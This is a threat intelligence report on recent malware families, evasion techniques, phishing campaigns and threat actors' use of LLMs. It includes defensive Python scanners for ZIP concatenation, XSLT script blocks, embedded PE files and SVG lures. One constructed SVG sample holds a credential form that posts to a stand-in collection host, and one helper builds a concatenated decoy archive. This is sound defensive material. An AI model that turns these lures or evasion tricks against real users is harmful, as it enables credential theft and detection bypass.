Threat Landscape Overview
This section expands on the changes to the threat landscape observed over the past months that were summarized earlier.
Tracked Malware Families
One of the foundational responsibilities of CTI and SOC teams lies in the ongoing surveillance of cybersecurity events in the world. This entails more than just tracking existing malware families and their evolving tactics, techniques, and procedures – it also requires the quick identification of newly emerging threats. Our goal is to remain a step ahead of cyber adversaries, enabling proactive defenses against both known and novel threats.
Beyond merely identifying new malware variants, security teams must maintain a real-time awareness of any shifts or changes within the larger threat landscape. This is crucial because the realm of cybersecurity is continually shifting. New malware campaigns, vulnerabilities, and changes in attacker behavior are just a few of the variables that the team closely monitors. In line with our efforts to provide robust defenses, we employ two key strategies: using YARA rules for malware detection and classification, and the generation of high-quality Indicators of Compromise (IOCs) through malware configuration extraction. These strategic assets are vital tools that enhance the accuracy and efficiency of our threat detection mechanisms.
In the past three months, our threat monitoring has identified the top 10 most prevalent malware families in the wild: Lumma, QuasarRAT, Emotet, AgentTesla, XWorm, GuLoader, xRAT, Stealc, Amadey, and Cobalt Strike. Tracking these active threats enables CTI and SOC teams to adapt defenses swiftly and maintain resilience against evolving cyber risks.
The most commonly faced threat sample types
Over the past year, phishing has continued to dominate the threat landscape, with more than 70% of all submissions to our platform being URLs and emails, further underscoring the persistent and evolving nature of phishing attacks.
Windows executables account for 7.1% of submissions, followed by PDF documents at 4.1%. Other notable sample types include unknown file types, macOS executables, HTML documents, and archives. URLs also represent the majority of recursive submissions, while Word documents are more frequently submitted directly, and PDFs are more often analyzed recursively—both aligning with common phishing tactics that use links and PDF attachments to deliver malicious payloads.
These trends mirror last year’s findings, reinforcing the need for robust detection and analysis capabilities to counter the growing phishing threat.
Trends in the Threat Landscape
The threat landscape continues to evolve with attackers constantly refining their techniques to bypass traditional security measures. In recent months, we have observed a surge in novel evasion methods designed to slip past defenses undetected. From the use of ZIP file concatenation to phishing campaigns leveraging corrupt Word documents, threat actors are finding increasingly creative ways to deliver malware.
Techniques such as embedding malicious code within XSLT stylesheets and implementing double-click checks to trigger payloads further highlight the sophistication of modern threats. This section explores these emerging trends, providing insights into the latest tactics employed by cyber adversaries and the implications for defenders.
Novel Evasion Techniques
From exploiting flaws in file structures to manipulating operating system features, attackers developed these approaches in the second half of 2024 to remain undetected while executing their campaigns. Below are examples of recent evasion tactics, their underlying mechanisms, and their implications for cybersecurity defenses.
ZIP File Concatenation
Threat actors have adopted the ZIP file concatenation technique to hide malicious payloads within compressed archives. This method exploits the differences in how different archive managers parse concatenated ZIP files, enabling attackers to hide their malware behind seemingly benign content.
How it works: Multiple ZIP files are concatenated by appending one to the next. Depending on the parser, either the first archive or the last one is shown to the user. For example, 7-Zip may show the malicious file (depending on which of the concatenated archives it sits in), while Windows Explorer does the opposite and shows the benign one. In one experiment this is exactly what happened, and only WinRAR revealed all files.
Example: In a phishing attack, a concatenated ZIP file contained a harmless PDF in one archive and a malicious executable in the other. Security scanners, which use parsers other than Windows Explorer, then analyze only the benign file, while the victim sees the malicious file in the Explorer window.
Advanced macOS Persistence
North Korean threat group BlueNoroff has developed macOS malware utilizing novel persistence mechanisms to target cryptocurrency firms. The Hidden Risk campaign employs a multi-stage infection chain and avoids detection by circumventing macOS’s App Transport Security policies.
How it works: A notarized dropper app downloads a decoy PDF and a malicious payload in the background. The payload achieves persistence by modifying the .zshenv file, which Zsh sources at the start of every session. This bypasses the persistence detection introduced in macOS 13+.
Impact: The malware avoids detection by traditional tools and connects to a C2 server to execute commands, including file exfiltration and shell command execution.
Stealthy Linux Malware Using udev Rules
The sedexp malware has remained undetected for over two years on Linux systems by exploiting an undocumented persistence technique involving udev rules.
How it works: A udev rule triggers malicious script execution whenever /dev/random is accessed, which happens at least once during system boot. The malware disguises itself as a legitimate process (kdevtmpfs) and manipulates memory to hide files containing “sedexp” from standard commands like ls and find.
Capabilities: Reverse shell creation, memory manipulation, and data exfiltration.
Phishing with Corrupted Word Documents
A novel phishing campaign exploits Microsoft Word’s file recovery feature by using intentionally corrupted documents to bypass email security filters and other security solutions. These documents recover as readable files, tricking users into scanning QR codes leading to credential-stealing phishing sites.
How it works: Corrupted Word files pass undetected through most antivirus solutions because their damaged structure prevents them from being parsed and scanned. Once Word's recovery feature repairs them, however, the currently observed samples display targeted branding and QR codes that redirect users to phishing sites mimicking Microsoft login pages.
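The ZIP concatenation trick and the corrupted Word documents described above come down to the same parser gap: a standard ZIP reader (and OOXML documents such as .docx are ZIP containers) trusts the central directory at the end of the file, so it reports only the last archive of a concatenated pair and nothing at all when that directory is damaged. The following Python is an added example, not code from the original report; it walks the local file headers instead, which recovers every entry in both situations. The archives it inspects are constructed in memory.

```python
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"   # starts every stored file entry
EOCD_SIG = b"PK\x05\x06"           # end-of-central-directory record


def walk_local_headers(data: bytes) -> list:
    """Enumerate entries by scanning for local file headers only.

    The central directory, which a standard parser trusts, is ignored, so this
    sees entries from every concatenated archive and from an archive whose
    trailing directory has been damaged.
    """
    entries, pos = [], 0
    while True:
        pos = data.find(LOCAL_HEADER_SIG, pos)
        if pos == -1 or pos + 30 > len(data):
            break
        # 30-byte local header (APPNOTE 4.3.7); little-endian fields after the signature:
        # version(2) flags(2) method(2) time(2) date(2) crc(4) csize(4) usize(4) nlen(2) xlen(2)
        (_ver, flags, method, _t, _d, _crc, csize, _usize, nlen, xlen) = struct.unpack_from(
            "<HHHHHIIIHH", data, pos + 4)
        name = data[pos + 30:pos + 30 + nlen].decode("utf-8", "replace")
        data_start = pos + 30 + nlen + xlen
        entries.append({"offset": pos, "name": name, "method": method,
                        "compressed_size": csize,
                        "truncated": data_start + csize > len(data)})
        # Flag bit 3 means sizes live in a trailing data descriptor and csize is 0,
        # so the payload cannot be skipped; resume scanning right after the name.
        pos = data_start + (0 if flags & 0x08 else csize)
    return entries


def parser_view(data: bytes) -> list:
    """What a normal, central-directory-based parser (Python's zipfile) reports."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.namelist()
    except zipfile.BadZipFile:
        return []


def analyze(data: bytes) -> dict:
    """Compare the two views and classify the archive."""
    local = walk_local_headers(data)
    visible = parser_view(data)
    eocd = data.count(EOCD_SIG)
    hidden = [e["name"] for e in local if e["name"] not in visible]
    verdict = "clean"
    if eocd > 1:
        verdict = "concatenated"          # several archives glued together
    elif eocd == 0 or (local and not visible):
        verdict = "damaged-directory"     # parser fails, entries still recoverable
    return {"eocd_records": eocd, "parser_sees": visible,
            "local_entries": [e["name"] for e in local],
            "hidden_from_parser": hidden, "verdict": verdict}


def build_zip(files: dict) -> bytes:
    """Constructed helper: build a small stored (uncompressed) archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a decoy archive, a second archive, and a damaged copy.
DECOY = build_zip({"invoice.pdf": b"%PDF-1.4 constructed decoy"})
SECOND = build_zip({"update.exe": b"constructed placeholder, not a real binary"})
CONCATENATED = DECOY + SECOND
DAMAGED = DECOY[:-22] + b"\x00" * 22   # overwrite the 22-byte EOCD record

if __name__ == "__main__":
    for label, blob in (("concatenated", CONCATENATED), ("damaged", DAMAGED)):
        print(label, analyze(blob))
```

An entry present in the local headers but absent from the parser's view is the one to send for analysis. One caveat: when flag bit 3 is set the walker resumes right after the file name, so a stored payload that happens to contain the PK\x03\x04 sequence can yield phantom entries; where a central directory exists, cross-checking CRCs against it removes them.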
Embedding Malicious Code in XSLT Stylesheets
Attackers have been observed leveraging the XSLT script processing capabilities in Microsoft XML Core Services (MSXML2) to execute malicious code as a side-effect of an XML transformation. By embedding harmful scripts within XSLT stylesheets, this technique evades traditional detection mechanisms and facilitates indirect code execution.
How it works: The attack begins with an Excel document containing VBA macros, which deliberately triggers the transformation of an XML file. This XML file references an XSLT stylesheet that includes malicious JScript embedded within <ms:script> tags. During the transformation process, the JScript executes, effectively shifting malicious activity to MSXML2 and bypassing static analysis tools that focus on the original document.
The delivery chain follows a structured flow. The initial stage involves Excel VBA macros, which activate the XML processing. The XML file then executes the embedded JScript within the XSLT stylesheet. This JScript component interacts with the Windows Installer to download the next-stage payload. Finally, an AutoHotKey script is used to communicate with a Command and Control (C2) server for additional instructions.
This technique exhibits several notable features. At the time of its discovery, the attack achieved a low detection rate, with only 4 out of 64 engines on VirusTotal identifying it as malicious. Anti-analysis techniques further complicate detection, as AI classifiers flagged the payload as benign. The secondary payloads included capabilities such as screenshot capture, with the captured images uploaded immediately to the C2 server.
This exploitation of MSXML2’s XSLT script processing highlights how attackers innovate to abuse lesser-known features of widely used software. Defenders must broaden the scope of behavioral analysis to detect such sophisticated methods effectively.
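A defender can triage XSLT files for this script extension statically. MSXML's script blocks live in the urn:schemas-microsoft-com:xslt namespace (the ms: or msxsl: prefix is arbitrary), default to JScript when no language is given, and are invoked from XPath expressions through the prefix named in implements-prefix. The Python scanner below is an added example, not the report's detection logic; the stylesheet it checks is constructed with a harmless function body.

```python
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
MSXSL_NS = "urn:schemas-microsoft-com:xslt"   # namespace of MSXML's <script> extension


def scan_stylesheet(xml_text: str) -> list:
    """Report constructs that let a transformation run code or reach outside the document."""
    root = ET.fromstring(xml_text)
    findings = []
    script_prefixes = set()
    for el in root.iter():
        if el.tag == f"{{{MSXSL_NS}}}script":
            prefix = el.get("implements-prefix", "")
            script_prefixes.add(prefix)
            findings.append({"kind": "msxsl-script",
                             "language": el.get("language", "JScript"),  # MSXML's default
                             "prefix": prefix,
                             "body_bytes": len((el.text or "").strip())})
        elif el.tag in (f"{{{XSL_NS}}}include", f"{{{XSL_NS}}}import"):
            findings.append({"kind": "external-stylesheet", "href": el.get("href", "")})
    # Second pass: where are script functions (prefix:name()) or document() invoked?
    for el in root.iter():
        for attr in ("select", "test", "match"):
            expr = el.get(attr)
            if not expr:
                continue
            if "document(" in expr:
                findings.append({"kind": "document-function", "expr": expr})
            for prefix in script_prefixes:
                if prefix and f"{prefix}:" in expr:
                    findings.append({"kind": "script-call", "expr": expr})
    return findings


def is_suspicious(xml_text: str) -> bool:
    """True when the stylesheet carries a script block or calls into one."""
    return any(f["kind"] in ("msxsl-script", "script-call") for f in scan_stylesheet(xml_text))


# Constructed sample: the shape of a script-bearing stylesheet with a harmless body.
SAMPLE_XSLT = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="urn:constructed-sample">
  <msxsl:script language="JScript" implements-prefix="user">
    function label() { return "constructed benign body"; }
  </msxsl:script>
  <xsl:template match="/">
    <out><xsl:value-of select="user:label()"/></out>
  </xsl:template>
</xsl:stylesheet>
"""

# Constructed control: an ordinary stylesheet with no extension functions.
BENIGN_XSLT = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><out><xsl:value-of select="/root/name"/></out></xsl:template>
</xsl:stylesheet>
"""

if __name__ == "__main__":
    for finding in scan_stylesheet(SAMPLE_XSLT):
        print(finding)
```

Use defusedxml or an equivalent hardened parser instead of xml.etree when the input is untrusted. A stylesheet only matters if a transformation runs with scripting enabled: MSXML 6.0 exposes an AllowXsltScript property that is false by default, so a delivery chain that depends on script blocks also has to switch it on, which is itself worth looking for in the triggering macro.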
Double-Click Check
A heavily obfuscated batch file employs a unique evasion technique that involves checking how it is executed. If the batch file determines it was launched through the command line, which often occurs in sandboxes or other analysis environments, it terminates immediately. However, if it was started by a double-click, which aligns with the behavior attackers anticipate from their victims, the file proceeds to download and execute an open-source information stealer from GitHub.
How it works: The batch file uses multiple obfuscation techniques to conceal its true purpose. One is SomalifuscatorV2, a tool that adds additional layers of obfuscation to the code. The file also carries a UTF-16 Byte Order Mark (BOM), which can confuse text editors, and uses ROT-24 encoding, which makes deobfuscation more challenging.
The execution flow includes several sophisticated steps to ensure its effectiveness. First, the file performs anti-virtual machine checks, requiring the machine to have more than 4 GB of RAM to proceed. Next, it downloads the KematianStealer PowerShell script directly from GitHub. Before executing the script, it modifies the stealer’s Command and Control (C2) URL dynamically to suit its needs.
Delivery Chain: The attack delivery follows a multi-step chain. Initially, the obfuscated batch file triggers MSHTA to execute additional obfuscated code. MSHTA then uses PowerShell to fetch and run the KematianStealer script. Finally, the PowerShell script interacts with Discord to exfiltrate sensitive data and establishes persistence on the compromised machine.
Notable Features: The file’s effectiveness is amplified by its ability to evade detection. It achieved a 0 out of 64 detection score on VirusTotal, rendering it entirely undetected by security tools at the time. Additionally, it incorporates anti-analysis measures by terminating execution unless it is launched via a double-click, thereby avoiding automated sandbox analysis.
Abusing MS Access ACCDE Files to Hide Malicious Code
An attacker–later believed to be a nation-state actor likely conducting espionage against the Pakistani navy–was found exploiting the ACCDE format of Microsoft Access. This format, a rarely monitored file type, was used to embed compiled malicious backdoors within database files. The ACCDE format obscures VBA macros by compiling them into p-code, which makes static analysis challenging.
How it works: When executed, the macro extracts a malicious Portable Executable (PE) file stored within a database table. The extracted file is then dropped onto the filesystem and executed. Once active, the PE file establishes a connection with a Command and Control (C2) server and waits for further instructions.
Key Features: This attack leveraged several features to enhance its stealth and effectiveness. The ACCDE file was entirely undetected, with a 0 out of 63 detection score on VirusTotal. The dropped PE file, named “MW-BLACK-Shell,” also maintained a low detection rate, with only 5 out of 75 detections. To further obscure its operation, the PE file was stored within the database as table data rather than being embedded directly in the macros. Additionally, the backdoor ensured persistence by scheduling itself to execute at specific intervals, such as daily at 9:30 AM.
Challenges for Defenders: Defending against such threats is complicated by several factors. ACCDE files are rarely used for malicious purposes, which makes them less likely to be flagged as suspicious by traditional security tools or trained employees alike. Furthermore, the hidden backdoor’s behavior can currently only be accurately observed through dynamic analysis, requiring the execution of the file to reveal its malicious payload.
This example emphasizes the need to monitor unconventional file formats and understand their potential for abuse in delivering malware.
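The ACCDE case stores the payload as table data, so the static signal is a complete PE image at an arbitrary offset inside a larger blob. A bare search for "MZ" is noisy; the Python below, added here and not the report's own tooling, validates the DOS header's e_lfanew pointer against the "PE\0\0" signature before reporting a hit and then reads the COFF fields that matter for triage. The blob it scans is constructed: a textual false positive followed by a fake header that contains no code.

```python
import struct

IMAGE_FILE_DLL = 0x2000
MACHINE_NAMES = {0x14C: "x86", 0x8664: "x64", 0xAA64: "ARM64"}


def find_embedded_pe(data: bytes) -> list:
    """Locate PE images anywhere in a blob by validating the DOS -> NT header chain.

    "MZ" alone is a weak signal; a hit requires e_lfanew (DOS header offset 0x3C)
    to land on a "PE\\0\\0" signature inside the buffer.
    """
    hits, pos = [], 0
    while True:
        pos = data.find(b"MZ", pos)
        if pos == -1:
            break
        if pos + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, pos + 0x3C)
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew <= 0x1000 and pe + 26 <= len(data) and data[pe:pe + 4] == b"PE\0\0":
                # COFF file header after the signature:
                # Machine(2) NumberOfSections(2) TimeDateStamp(4) PtrToSymTab(4)
                # NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
                machine, nsections, _ts, _sym, _nsym, _optsize, chars = struct.unpack_from(
                    "<HHIIIHH", data, pe + 4)
                (magic,) = struct.unpack_from("<H", data, pe + 24)   # optional header magic
                hits.append({"offset": pos,
                             "machine": MACHINE_NAMES.get(machine, hex(machine)),
                             "sections": nsections,
                             "is_dll": bool(chars & IMAGE_FILE_DLL),
                             "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown")})
        pos += 1
    return hits


def build_fake_pe_header(machine: int = 0x8664, characteristics: int = 0x0022) -> bytes:
    """Constructed: a DOS stub plus COFF header and optional-header magic, no code at all."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)           # e_lfanew -> right after the stub
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", machine, 2, 0, 0, 0, 0xF0, characteristics)
    return bytes(dos) + coff + struct.pack("<H", 0x20B)   # PE32+ magic


# Constructed stand-in for a database table dump: text containing a decoy "MZ",
# then the fake image surrounded by NUL padding as it might sit in a binary field.
PREFIX = b"MZ is an ordinary letter pair in text\x00" + b"\x00" * 64
SAMPLE_TABLE_BLOB = PREFIX + build_fake_pe_header() + b"\x00" * 32

if __name__ == "__main__":
    for hit in find_embedded_pe(SAMPLE_TABLE_BLOB):
        print(hit)
```

Run it over the raw .accde file or over exported table contents; the same check applies to any other container (archive entries, XML, images) since the carve is format-agnostic. A genuine hit at a non-zero offset inside a database file justifies the sandbox run that the report notes is currently the only way to observe the backdoor's behavior.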
(Ab)use of AI
The second half of 2024 has confirmed what experts long anticipated: the misuse of large language models (LLMs) by threat actors. With their ability to produce high-quality outputs rapidly, LLMs have become a tool for attackers, allowing individuals with minimal technical knowledge to generate highly targeted and complex threats. These tools have proven to lower the barrier to entry for cybercriminals while significantly enhancing their precision and efficiency.
AI-Assisted Malware Development
Generative AI has become an enabler for crafting malicious code, with PowerShell scripts and other malware components observed in recent attacks that include artifacts of AI-generated code. For instance, a phishing campaign targeting French users employed HTML smuggling techniques to distribute password-protected ZIP archives containing neatly commented VBScript and JavaScript code.
These comments, formatted similarly to those produced by generative AI tools, clarified the functionality of the malware in a way that contrasted with typical obfuscation methods used by threat actors.
Threat actors have also been observed experimenting with Google’s Gemini AI service to generate and refine malicious code. Iranian, Chinese, North Korean, and Russian state-backed actors misused Gemini for tasks such as malware scripting, payload obfuscation, and vulnerability research.
AI in Phishing and Reconnaissance
Beyond malware development, LLMs have been instrumental in producing convincing phishing campaigns. AI-assisted tools can tailor phishing emails to specific targets, industries, or regions, increasing the success rate of these attacks. For example, phishing campaigns delivering AsyncRAT malware were identified, with emails and scripts polished to a degree likely unattainable for the average attacker without AI assistance.
Government-backed threat actors have also leveraged AI models for reconnaissance and pre-attack research. Google’s analysis of Gemini AI interactions revealed that groups like SweetSpecter (China), APT42 (Iran), and North Korean adversaries used AI to:
Search for vulnerabilities in applications and identify Log4j instances susceptible to Log4Shell exploitation.
Request information about CVE numbers and content management systems.
Generate scripts for uploading web shells using tools like sqlmap.
Conduct reconnaissance on specific industries, such as researching common content management systems used abroad or identifying targets within automotive infrastructure.
North Korean adversaries, in particular, were found using AI for job fraud schemes, crafting fake resumes and cover letters to infiltrate Western tech firms under false identities.
Advanced Social Engineering and Scripting
AI tools have also elevated social engineering campaigns. SweetSpecter used ChatGPT to brainstorm themes for phishing emails, generate variations of job recruitment messages, and develop code for sending messages programmatically. Iranian APT42 actors used Gemini to tailor phishing campaigns targeting defense personnel, leveraging AI for reconnaissance on individual experts and organizations.
Google’s report further revealed that Chinese APT actors used Gemini to conduct reconnaissance on U.S. military networks and IT service providers, as well as research advanced defense evasion techniques. Additionally, Iranian and North Korean APT groups experimented with LLMs to refine exploitation techniques, request translations of exploit documentation, and generate obfuscated VBA scripts for payload execution.
AI as a Defensive Tool
While the misuse of AI is a growing concern, these tools also provide significant advantages to defenders. Security researchers have used LLMs to quickly generate sophisticated malware samples for testing, simulate attack scenarios, and improve de-obfuscation and decompilation workflows in reverse engineering. By leveraging AI in these ways, defenders can enhance their preparedness against evolving threats.
Phishing
Phishing campaigns have evolved to exploit trust in well-known platforms and sophisticated social engineering techniques to deceive victims. Below are notable examples of how phishing attackers are innovating to steal sensitive data and compromise systems.
Facebook Malvertising Campaigns
Cybercriminals have begun leveraging Facebook’s expansive advertising network to distribute SYS01, a malware designed to steal sensitive information. Attackers use two main methods to propagate their malicious campaigns: creating fake Facebook business pages or hijacking legitimate ones.
These pages are then used to promote ads encouraging users to download fake Windows themes, pirated games, or software cracks. Victims are redirected to websites hosting ZIP archives that deliver the malware, which is capable of stealing browser cookies, saved credentials, and Facebook account details.
How it works: To maximize the effectiveness of their campaigns, the attackers employ several techniques. Hijacked Facebook pages are renamed to align with the themes of their malicious ads, ensuring the ads reach the pages’ existing followers and boosting credibility.
The malware also incorporates advanced evasion tactics, including DLL sideloading and PowerShell scripts, to bypass virtualized environments and antivirus tools. Once installed, the malware focuses on stealing data such as browsing history, saved credentials, and Facebook-specific information, including profile details and managed page access.
This use of Facebook’s trusted platform to reach a wide audience demonstrates how attackers exploit legitimate systems to enhance the reach of their malware campaigns. By hijacking unrelated Facebook pages, they even manage to weaponize existing follower bases to amplify the spread of their malicious activities.
Abusing GitHub
Threat actors have started using GitHub as a platform to spread information-stealing malware like Lumma Stealer. By exploiting developer trust in GitHub’s collaborative tools, attackers employ tactics such as posting fake fixes in comments or creating fraudulent issues in repositories to deceive developers into downloading malicious files.
How it works: The attackers use a variety of approaches to target unsuspecting developers. One tactic involves posting malicious comments on GitHub projects, with over 29,000 such comments observed. These comments contain links to archives hosting malware.
Another method abuses GitHub’s issue-tracking system by sending emails to users that claim to notify them of vulnerabilities. These emails direct recipients to phishing domains, such as “github-scanner[.]com,” under the guise of providing security fixes.
To further entice victims, the malware is distributed through password-protected ZIP files. Once extracted, the included executables steal credentials, browser cookies, and cryptocurrency wallets from the infected system.
Developers now face the added challenge of navigating potential threats in the comments and issues sections of their projects. It is crucial to scrutinize shared resources and links carefully before downloading or executing them to mitigate the risk of falling victim to these attacks.
Exploiting StackExchange for Targeted Attacks
Malicious Python packages were recently promoted on StackExchange forums, targeting developers working within the Solana and Raydium blockchain ecosystems. These packages, hosted on PyPI, downloaded scripts that exfiltrated sensitive information, including wallet keys and browser credentials.
Attack Details: The attackers used packages such as sol-structs and raydium-sdk, which were crafted to appear legitimate to unsuspecting developers. To promote these packages, the threat actors posted high-quality, seemingly credible answers on StackExchange threads, directing users to the malicious resources. The impact of this attack was significant, with reported cases including an IT employee whose Solana wallet was completely drained and another victim whose private key was exposed.
This campaign demonstrates a novel evolution of package-based attacks. While typosquatting–creating malicious packages with names similar to legitimate ones–has long been a common tactic, deliberately leveraging trusted forums like StackExchange to promote harmful advice introduces a new and concerning attack vector. Developers should remain vigilant when downloading packages and critically assess recommendations, even from seemingly reliable sources.
Pastejacking: Manipulating the Clipboard
Attackers are increasingly using “pastejacking” as a deceptive method to trick users into executing malicious code by abusing the clipboard functionality. This tactic involves creating malicious websites that secretly alter the contents of a user’s clipboard, replacing copied text with harmful commands and instructing the user to paste these commands into a window that will execute them.
How it works: Pastejacking exploits the user's own interaction with the clipboard. A malicious website injects harmful commands into the clipboard, replacing the content the user intended to copy. Typically, users are then instructed to press Windows + R to open the “Run” dialog, use CTRL+V to paste the altered clipboard contents, and press Enter to execute the command.
In a notable example, attackers pretended to provide troubleshooting steps for installing a missing Chrome extension. They directed users to copy and paste a command which, unbeknownst to the victims, contained malicious instructions.
Impact: The consequences of pastejacking can be severe. The malicious code, once executed, may install malware, exfiltrate sensitive data, or compromise the victim’s system. Many users remain unaware of the command’s true purpose, as they believe they are simply following legitimate troubleshooting advice.
SVG Phishing: Leveraging Scalable Vector Graphics for Attacks
Attackers are now exploiting Scalable Vector Graphics (SVG) image files in phishing campaigns to bypass traditional email security filters and deliver malicious payloads. The unique properties of SVG files make them a versatile medium for crafting deceptive attacks.
How it works: Unlike traditional image formats like PNG or JPG, SVG files are instruction-based and can embed scripts or HTML code directly within the file. Threat actors leverage this capability in multiple ways to deceive their victims.
One common tactic involves embedding phishing forms using the <foreignObject> element within the SVG files. These forms are designed to mimic legitimate login portals, such as those for Microsoft or Google accounts, tricking users into entering their credentials. In other cases, attackers use SVG files to include embedded JavaScript or encoded URLs that redirect victims to phishing sites automatically when the file is opened.
Examples: In one reported case, an SVG file presented itself as a fake Excel spreadsheet. This file contained a deceptive login form that harvested user credentials and sent them to the attacker’s server. Another campaign weaponized SVG files as clickable images, luring users to download malware from remote locations.
SVG-based attacks are particularly effective because the file format is often associated with other image formats and thus perceived as harmless. Many traditional security tools fail to analyze the embedded content within SVG files, allowing attackers to bypass detection mechanisms.
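The properties that make SVG useful to attackers are visible in the markup, which is what a mail gateway should inspect instead of treating the file as a picture. The Python scanner below is an added example, not the report's detection logic; it flags <script> elements, <foreignObject> wrappers and any HTML form inside them, inline event handlers, and javascript:/data: or external hrefs. The sample SVG it checks is constructed to resemble the spreadsheet lure described above, with a form that posts to an invented host.

```python
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"


def local(name: str) -> str:
    """Strip ElementTree's '{namespace}' prefix from a tag or attribute name."""
    return name.rsplit("}", 1)[-1]


def scan_svg(svg_text: str) -> list:
    """List active-content constructs that a raster image could never carry."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        # Browsers render sloppy markup that strict XML parsers reject; that is itself notable.
        return [{"kind": "unparseable", "detail": str(exc)}]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag == "script":
            src = el.get("href") or el.get(f"{{{XLINK_NS}}}href")
            findings.append({"kind": "script-element", "src": src})
        elif tag == "foreignObject":
            inner = {local(c.tag) for c in el.iter()} - {"foreignObject"}
            findings.append({"kind": "foreign-object", "contains": sorted(inner)})
            for form in (c for c in el.iter() if local(c.tag) == "form"):
                findings.append({"kind": "embedded-form", "action": form.get("action", "")})
        for attr, val in el.attrib.items():
            name, v = local(attr), val.strip().lower()
            if name.startswith("on"):                       # onclick, onload, ...
                findings.append({"kind": "event-handler", "attr": name, "tag": tag})
            elif name == "href" and v.startswith(("javascript:", "data:text/html")):
                findings.append({"kind": "script-uri", "tag": tag})
            elif name == "href" and v.startswith(("http://", "https://")):
                findings.append({"kind": "external-link", "tag": tag, "href": val})
    return findings


def is_active_svg(svg_text: str) -> bool:
    """True when the file should be handled as active content rather than as an image."""
    return any(f["kind"] in ("script-element", "foreign-object", "event-handler",
                             "script-uri", "unparseable") for f in scan_svg(svg_text))


# Constructed lure: a fake spreadsheet with a credential form and a script block.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xhtml="http://www.w3.org/1999/xhtml" width="600" height="400">
  <text x="20" y="30">Quarterly_Report.xlsx</text>
  <foreignObject x="0" y="40" width="600" height="300">
    <xhtml:form action="https://collect.example/login" method="post">
      <xhtml:input name="email" type="text"/>
      <xhtml:input name="password" type="password"/>
    </xhtml:form>
  </foreignObject>
  <script>console.log("constructed placeholder body")</script>
</svg>
"""

# Constructed control: a plain vector drawing.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="steelblue"/>
</svg>
"""

if __name__ == "__main__":
    for finding in scan_svg(SAMPLE_SVG):
        print(finding)
```

Treat a parse error as a finding rather than a pass, and apply the scan to SVGs extracted from archives and HTML attachments as well as to bare .svg files, since the report notes that many tools never look inside the format at all.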
DoubleClickjacking Attacks
DoubleClickjacking is an emerging variation of clickjacking that exploits the timing of mouse double-clicks to deceive users into performing unauthorized actions. This attack leverages the natural behavior of users interacting with websites, making it both subtle and effective.
Scenario: Victims are tricked into double-clicking on an element in a new window, such as to solve a CAPTCHA. While the first click interacts with the intended interface, it also immediately closes the window so that the second click triggers an action on a button or link at the same spot in the window behind it. These elements can initiate actions such as granting OAuth permissions, approving multi-factor authentication (MFA) requests, or performing other sensitive and authenticated operations.
What makes this technique particularly dangerous is its ability to bypass traditional clickjacking defenses. Unlike classic clickjacking, DoubleClickjacking does not rely on iframes or cross-site cookies, which are the focus of most protective measures. This allows the attack to slip through defenses that are designed to block older methods.
Demonstrations of this attack have shown its potential to compromise accounts on popular platforms like Shopify, Slack, and Salesforce. By exploiting this vulnerability, attackers can gain unauthorized access to sensitive accounts and resources.
Targeting Developers with Fake Job Offers
The Contagious Interview campaign has emerged as a sophisticated attack targeting software developers by luring them with fake job offers. The ultimate goal of this campaign is to deliver malware, such as OtterCookie, to steal sensitive data and compromise systems.
Delivery: The delivery of OtterCookie relies on loaders embedded within Node.js projects, npm packages, and applications built using frameworks like Qt or Electron. Once executed, the malware exfiltrates sensitive information, including cryptocurrency wallet keys and clipboard contents, by utilizing secure WebSocket communications to avoid detection.
This campaign exploits the workflow of developers who may unknowingly execute malicious scripts while testing or working on projects linked to these fraudulent job offers. By embedding malware into development environments and disguising it within seemingly legitimate projects, attackers ensure a higher likelihood of execution by their targets.
QR Code Phishing (Quishing)
QR codes have become an increasingly popular tool for phishing campaigns, with attackers leveraging their ability to encode URLs in ways that evade detection and manipulate unsuspecting victims. Their versatility and widespread use make them an attractive vector for delivering malicious links.
How it works: One tactic involves the use of cropped or incomplete QR codes. Attackers design these QR codes to exploit differences in how mobile devices and security tools interpret them. While security tools often fail to extract the malicious phishing URL from such QR codes, victims scanning them with their phones are seamlessly directed to the intended phishing site. This approach allows attackers to bypass automated detection mechanisms while still effectively targeting end users.
In another method, attackers create QR codes using HTML or ASCII symbols to render them directly on a webpage. These QR codes are clearly visible to victims but may escape detection by security tools that focus on image-based QR codes. By embedding the QR code in a way that bypasses conventional scanning techniques, attackers increase their chances of success.
These techniques highlight the importance of treating QR codes with caution, especially those received through email or displayed on untrusted websites. Scanning unfamiliar QR codes without verifying their source can expose users to phishing sites and other security risks. Staying vigilant and employing additional security measures is essential to mitigating the threats posed by this emerging attack vector.
Abuse of Open Redirection Vulnerabilities
Attackers are increasingly exploiting open redirection vulnerabilities to mask the delivery of malicious payloads. By chaining multiple trusted domains, they create complex redirection paths that bypass detection tools and lead victims to phishing sites or malware.
Example: In one documented attack, the redirection chain utilized a series of trusted platforms, including YouTube, Google Meet, Google Search, Google AMP, a URL shortener, and a website builder. Each step in the chain relied on the credibility of the preceding domain to reduce suspicion among users and evade detection by automated tools. The final destination was a site hosting the malicious payload, but the intermediate steps effectively concealed the attack’s true intent.
